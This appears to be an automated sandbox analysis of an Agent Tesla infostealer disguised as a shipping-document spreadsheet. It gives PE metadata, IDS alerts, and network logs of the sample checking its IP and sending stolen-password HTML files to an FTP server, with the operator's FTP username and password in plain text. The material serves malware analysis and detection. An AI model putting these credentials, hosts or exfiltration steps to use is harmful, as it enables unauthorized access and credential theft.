                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5da9c0x4f.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x57fc.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x5baf40x5bc003baecde0ea57098db1f57d68e7d44116False0.7095431709809265data6.262431815006639IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc0x5e0000x57fc0x5800afd927d7ef1fa8e49cdaf718940ab222False0.30961470170454547data5.299107668039321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x640000xc0x2006cdba09c6804cc529fd720cb37e0993aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0x5e1f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.4920212765957447
                    RT_ICON0x5e6580x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.32704918032786884
                    RT_ICON0x5efe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.2303001876172608
                    RT_ICON0x600880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.15995850622406638
                    RT_ICON0x626300xc1dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8742341180264431
                    RT_GROUP_ICON0x632500x4cdata0.75
                    RT_VERSION0x6329c0x374data0.4117647058823529
                    RT_MANIFEST0x636100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                    DLLImport
                    mscoree.dll_CorExeMain
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/10/24-02:45:09.894395TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4973363293192.168.2.4213.189.52.181
                    06/10/24-02:45:22.633258TCP2029927ET TROJAN AgentTesla Exfil via FTP4973521192.168.2.4213.189.52.181
                    06/10/24-02:45:23.375348TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4973863241192.168.2.4213.189.52.181
                    06/10/24-02:45:30.506071TCP2029927ET TROJAN AgentTesla Exfil via FTP4974421192.168.2.4213.189.52.181
                    06/10/24-02:46:44.543119TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4974763852192.168.2.4213.189.52.181
                    06/10/24-02:45:31.250198TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4974565089192.168.2.4213.189.52.181
                    06/10/24-02:45:09.894395TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4973363293192.168.2.4213.189.52.181
                    06/10/24-02:45:31.250198TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4974565089192.168.2.4213.189.52.181
                    06/10/24-02:45:09.156084TCP2029927ET TROJAN AgentTesla Exfil via FTP4973221192.168.2.4213.189.52.181
                    06/10/24-02:45:23.375348TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4973863241192.168.2.4213.189.52.181
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 10, 2024 02:45:04.967667103 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:04.967704058 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:04.967787027 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:04.973115921 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:04.973129034 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.595381021 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.595516920 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:05.598488092 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:05.598496914 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.598901033 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.646042109 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:05.652002096 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:05.696537971 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.826961040 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.827104092 CEST44349731172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:05.827178955 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:05.829041958 CEST49731443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:06.832494020 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:06.837563038 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:06.837714911 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:07.573301077 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:07.573487043 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:07.578474998 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:07.828468084 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:07.828907013 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:07.834161997 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.126197100 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.126594067 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:08.131562948 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.381879091 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.382056952 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:08.387079000 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.636934996 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.637213945 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:08.644274950 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.894148111 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:08.894428015 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:08.899974108 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.150008917 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.150593042 CEST4973363293192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:09.155677080 CEST6329349733213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.155833960 CEST4973363293192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:09.156084061 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:09.161005020 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.894026041 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.894395113 CEST4973363293192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:09.894395113 CEST4973363293192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:09.899705887 CEST6329349733213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.900134087 CEST6329349733213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:09.900190115 CEST4973363293192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:09.943182945 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:10.150810003 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:10.207027912 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:18.915874004 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:18.915911913 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:18.915981054 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:18.919687033 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:18.919703960 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.530020952 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.530256033 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:19.531410933 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:19.531440973 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.531961918 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.583620071 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:19.587459087 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:19.632508039 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.758974075 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.759116888 CEST44349734172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:19.759171009 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:19.764759064 CEST49734443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:20.280445099 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:20.285774946 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:20.285855055 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:21.028750896 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.028922081 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:21.033843994 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.285542011 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.285667896 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:21.290843964 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.584898949 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.585084915 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:21.590030909 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.841763020 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:21.841897011 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:21.846820116 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.098315001 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.098434925 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:22.104554892 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.370929956 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.371058941 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:22.375984907 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.627655029 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.628190994 CEST4973863241192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:22.633132935 CEST6324149738213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:22.633212090 CEST4973863241192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:22.633258104 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:22.638418913 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:23.375144958 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:23.375348091 CEST4973863241192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:23.375427961 CEST4973863241192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:23.382065058 CEST6324149738213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:23.382422924 CEST6324149738213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:23.382477045 CEST4973863241192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:23.427233934 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:23.634179115 CEST2149735213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:23.677243948 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:26.916609049 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:26.916632891 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:26.916702032 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:26.919923067 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:26.919933081 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.530625105 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.530733109 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:27.534660101 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:27.534667015 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.534984112 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.577254057 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:27.593044043 CEST4973521192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:27.624494076 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.759439945 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.759596109 CEST44349743172.67.74.152192.168.2.4
                    Jun 10, 2024 02:45:27.759823084 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:27.761625051 CEST49743443192.168.2.4172.67.74.152
                    Jun 10, 2024 02:45:28.158037901 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:28.163242102 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:28.163333893 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:28.905561924 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:28.905752897 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:28.910743952 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.162507057 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.162797928 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:29.167906046 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.467304945 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.467585087 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:29.472771883 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.724272966 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.728061914 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:29.733393908 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.984989882 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:29.985388041 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:29.991781950 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:30.242754936 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:30.243065119 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:30.248127937 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:30.500247955 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:30.500725031 CEST4974565089192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:30.505834103 CEST6508949745213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:30.505978107 CEST4974565089192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:30.506071091 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:30.511234999 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:31.249989033 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:31.250197887 CEST4974565089192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:31.250238895 CEST4974565089192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:31.255146980 CEST6508949745213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:31.255580902 CEST6508949745213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:31.255634069 CEST4974565089192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:31.302367926 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:45:31.508450985 CEST2149744213.189.52.181192.168.2.4
                    Jun 10, 2024 02:45:31.552253962 CEST4974421192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:43.531194925 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:43.536309004 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:43.787116051 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:43.787892103 CEST4974763852192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:43.792962074 CEST6385249747213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:43.793044090 CEST4974763852192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:43.793097019 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:43.797955990 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:44.542843103 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:44.543118954 CEST4974763852192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:44.543118954 CEST4974763852192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:44.548078060 CEST6385249747213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:44.548762083 CEST6385249747213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:44.548823118 CEST4974763852192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:44.583471060 CEST4973221192.168.2.4213.189.52.181
                    Jun 10, 2024 02:46:44.802555084 CEST2149732213.189.52.181192.168.2.4
                    Jun 10, 2024 02:46:44.849103928 CEST4973221192.168.2.4213.189.52.181
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 10, 2024 02:45:04.954792023 CEST5021153192.168.2.41.1.1.1
                    Jun 10, 2024 02:45:04.961674929 CEST53502111.1.1.1192.168.2.4
                    Jun 10, 2024 02:45:06.822475910 CEST5893353192.168.2.41.1.1.1
                    Jun 10, 2024 02:45:06.831597090 CEST53589331.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jun 10, 2024 02:45:04.954792023 CEST192.168.2.41.1.1.10xfff4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Jun 10, 2024 02:45:06.822475910 CEST192.168.2.41.1.1.10xe43aStandard query (0)s4.serv00.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jun 10, 2024 02:45:04.961674929 CEST1.1.1.1192.168.2.40xfff4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                    Jun 10, 2024 02:45:04.961674929 CEST1.1.1.1192.168.2.40xfff4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                    Jun 10, 2024 02:45:04.961674929 CEST1.1.1.1192.168.2.40xfff4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                    Jun 10, 2024 02:45:06.831597090 CEST1.1.1.1192.168.2.40xe43aNo error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false
                    • api.ipify.org
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449731172.67.74.1524436968C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    TimestampBytes transferredDirectionData
                    2024-06-10 00:45:05 UTC155OUTGET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                    Host: api.ipify.org
                    Connection: Keep-Alive
                    2024-06-10 00:45:05 UTC211INHTTP/1.1 200 OK
                    Date: Mon, 10 Jun 2024 00:45:05 GMT
                    Content-Type: text/plain
                    Content-Length: 14
                    Connection: close
                    Vary: Origin
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 8915562ebd024647-DFW
                    2024-06-10 00:45:05 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                    Data Ascii: 173.254.250.91


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449734172.67.74.1524436332C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    TimestampBytes transferredDirectionData
                    2024-06-10 00:45:19 UTC155OUTGET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                    Host: api.ipify.org
                    Connection: Keep-Alive
                    2024-06-10 00:45:19 UTC211INHTTP/1.1 200 OK
                    Date: Mon, 10 Jun 2024 00:45:19 GMT
                    Content-Type: text/plain
                    Content-Length: 14
                    Connection: close
                    Vary: Origin
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 89155685dbed72f3-DFW
                    2024-06-10 00:45:19 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                    Data Ascii: 173.254.250.91


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449743172.67.74.1524436672C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    TimestampBytes transferredDirectionData
                    2024-06-10 00:45:27 UTC155OUTGET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                    Host: api.ipify.org
                    Connection: Keep-Alive
                    2024-06-10 00:45:27 UTC211INHTTP/1.1 200 OK
                    Date: Mon, 10 Jun 2024 00:45:27 GMT
                    Content-Type: text/plain
                    Content-Length: 14
                    Connection: close
                    Vary: Origin
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 891556b7c9cf2e73-DFW
                    2024-06-10 00:45:27 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                    Data Ascii: 173.254.250.91


                    TimestampSource PortDest PortSource IPDest IPCommands
                    Jun 10, 2024 02:45:07.573301077 CEST2149732213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 02:45. Server port: 21.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Jun 10, 2024 02:45:07.573487043 CEST4973221192.168.2.4213.189.52.181USER f2241_dol
                    Jun 10, 2024 02:45:07.828468084 CEST2149732213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                    Jun 10, 2024 02:45:07.828907013 CEST4973221192.168.2.4213.189.52.181PASS Doll900#@
                    Jun 10, 2024 02:45:08.126197100 CEST2149732213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                    Jun 10, 2024 02:45:08.381879091 CEST2149732213.189.52.181192.168.2.4504 Unknown command
                    Jun 10, 2024 02:45:08.382056952 CEST4973221192.168.2.4213.189.52.181PWD
                    Jun 10, 2024 02:45:08.636934996 CEST2149732213.189.52.181192.168.2.4257 "/" is your current location
                    Jun 10, 2024 02:45:08.637213945 CEST4973221192.168.2.4213.189.52.181TYPE I
                    Jun 10, 2024 02:45:08.894148111 CEST2149732213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                    Jun 10, 2024 02:45:08.894428015 CEST4973221192.168.2.4213.189.52.181PASV
                    Jun 10, 2024 02:45:09.150008917 CEST2149732213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,247,61)
                    Jun 10, 2024 02:45:09.156084061 CEST4973221192.168.2.4213.189.52.181STOR PW_user-818225_2024_06_09_20_45_05.html
                    Jun 10, 2024 02:45:09.894026041 CEST2149732213.189.52.181192.168.2.4150 Accepted data connection
                    Jun 10, 2024 02:45:10.150810003 CEST2149732213.189.52.181192.168.2.4226-File successfully transferred
                    226-File successfully transferred226 0.258 seconds (measured here), 1.32 Kbytes per second
                    Jun 10, 2024 02:45:21.028750896 CEST2149735213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 02:45. Server port: 21.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Jun 10, 2024 02:45:21.028922081 CEST4973521192.168.2.4213.189.52.181USER f2241_dol
                    Jun 10, 2024 02:45:21.285542011 CEST2149735213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                    Jun 10, 2024 02:45:21.285667896 CEST4973521192.168.2.4213.189.52.181PASS Doll900#@
                    Jun 10, 2024 02:45:21.584898949 CEST2149735213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                    Jun 10, 2024 02:45:21.841763020 CEST2149735213.189.52.181192.168.2.4504 Unknown command
                    Jun 10, 2024 02:45:21.841897011 CEST4973521192.168.2.4213.189.52.181PWD
                    Jun 10, 2024 02:45:22.098315001 CEST2149735213.189.52.181192.168.2.4257 "/" is your current location
                    Jun 10, 2024 02:45:22.098434925 CEST4973521192.168.2.4213.189.52.181TYPE I
                    Jun 10, 2024 02:45:22.370929956 CEST2149735213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                    Jun 10, 2024 02:45:22.371058941 CEST4973521192.168.2.4213.189.52.181PASV
                    Jun 10, 2024 02:45:22.627655029 CEST2149735213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,247,9)
                    Jun 10, 2024 02:45:22.633258104 CEST4973521192.168.2.4213.189.52.181STOR PW_user-818225_2024_06_09_20_45_18.html
                    Jun 10, 2024 02:45:23.375144958 CEST2149735213.189.52.181192.168.2.4150 Accepted data connection
                    Jun 10, 2024 02:45:23.634179115 CEST2149735213.189.52.181192.168.2.4226-File successfully transferred
                    226-File successfully transferred226 0.259 seconds (measured here), 1.32 Kbytes per second
                    Jun 10, 2024 02:45:28.905561924 CEST2149744213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 02:45. Server port: 21.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Jun 10, 2024 02:45:28.905752897 CEST4974421192.168.2.4213.189.52.181USER f2241_dol
                    Jun 10, 2024 02:45:29.162507057 CEST2149744213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                    Jun 10, 2024 02:45:29.162797928 CEST4974421192.168.2.4213.189.52.181PASS Doll900#@
